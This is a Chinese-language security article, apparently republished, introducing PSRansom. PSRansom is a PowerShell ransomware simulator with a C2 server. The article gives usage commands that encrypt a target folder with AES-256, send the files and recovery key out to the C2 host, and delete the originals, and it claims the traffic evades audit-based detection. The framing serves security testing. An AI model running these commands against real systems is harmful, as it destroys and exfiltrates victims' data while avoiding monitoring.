如何使用PSRansom进行勒索软件安全分析

安全
该工具可以帮助广大研究人员模拟针对任何操作系统平台的通用勒索软件数据加密过程。

关于PSRansom

PSRansom是一款带有C2服务器功能的PowerShell勒索软件模拟工具,该工具可以帮助广大研究人员模拟针对任何操作系统平台(只要安装了PowerShell即可)的通用勒索软件数据加密过程。在C2服务器功能的帮助下,我们甚至还可以通过HTTP从目标设备(客户端)中提取文件,并在服务器端接收信息。

客户端和服务器端之间的通信数据都经过了加密和编码,因此是无法被基于流量审计的检查工具所检测到的。

工具要求

PowerShell 4.0或更高版本

工具下载

广大研究人员可以使用下列命令将该项目源码克隆至本地:git clone https://github.com/JoelGMSec/PSRansom

或者直接访问该项目的【​​Releases页面​​】下载工具的压缩文件。

下载完成之后,我们将拿到两个脚本:PSRansom和C2Server。第一个将模拟勒索软件感染,而第二个将负责恢复文件及其恢复密钥。

工具使用

该工具的使用非常简单,我们只需要指明要加密的目录、C2 服务器的 IP 或主机名以及接收连接的端口。

除此之外,如果我们需要发送加密文件,则需要在命令结尾添加-x参数选项即可。在解密的时候,只需要指明目录和恢复密钥即可。

工具使用样例

首先,我们的测试场景定义如下:

  • 勒索软件将在 Windows 机器上运行
  • 我们要加密的文件夹位于 C:\Backup
  • C2 服务器将在 Kali Linux 上运行
  • 所有流量都将通过代理查看详细信息

接下来,我们看看该工具提供了哪些操作选项:

命令和控制服务器的使用也非常简单,我们只需要指明监听连接的端口和接收连接的端口即可。这里,我们使用的是80端口:

pwsh C2Server.ps1 + 80

接下来,我们将使用以下命令运行加密和渗透:

.\PSRansom.ps1 -e directory -s ServerC2 -p port -x

此时将生成24 个字母数字字符(小写、大写和数字)的随机密钥,数据将以 AES256 加密,并将恢复密钥发送到 C2 服务器。

完成后,原始文件将被删除,仅保留加密的文件:

服务器端将接收到类似如下图所示的内容:

现在,我们将在服务器端接收到目标设备的信息、恢复密钥、加密文件列表等:

许可证协议

本项目的开发与发布遵循​​GPL-3.0​​开源许可证协议。

项目地址

PSRansom:【​​GitHub传送门​​】

责任编辑:赵宁宁 来源: FreeBuf.COM
相关推荐

2021-03-02 10:17:09

勒索软件Nefilimr网络安全

2021-03-04 11:02:07

勒索软件Nefilim幽灵账户

2023-03-24 12:14:42

2021-11-26 08:45:06

NetworKi网络安全分析安全工具

2023-03-24 15:55:22

2019-04-09 09:06:36

2021-11-04 05:43:38

GoKartGo代码静态安全分析

2021-06-01 11:01:08

勒索软件发展分析反勒索软件日

2020-12-02 13:28:56

勒索软件漏洞网络攻击

2022-03-02 00:06:36

数据勒索软件恶意软件

2021-11-01 11:51:24

勒索软件恶意软件安全

2022-09-27 14:46:03

网络安全计算机恶意软件

2017-02-27 16:57:58

2020-04-15 15:28:24

Fireeye勒索软件恶意软件

2023-08-03 15:06:57

2023-03-02 07:29:35

2015-09-11 15:41:08

2022-01-26 23:12:42

Windows 10勒索软件安全

2022-07-05 13:49:38

勒索团伙QakBot银行木马

2023-09-23 08:06:30

点赞
收藏

51CTO技术栈公众号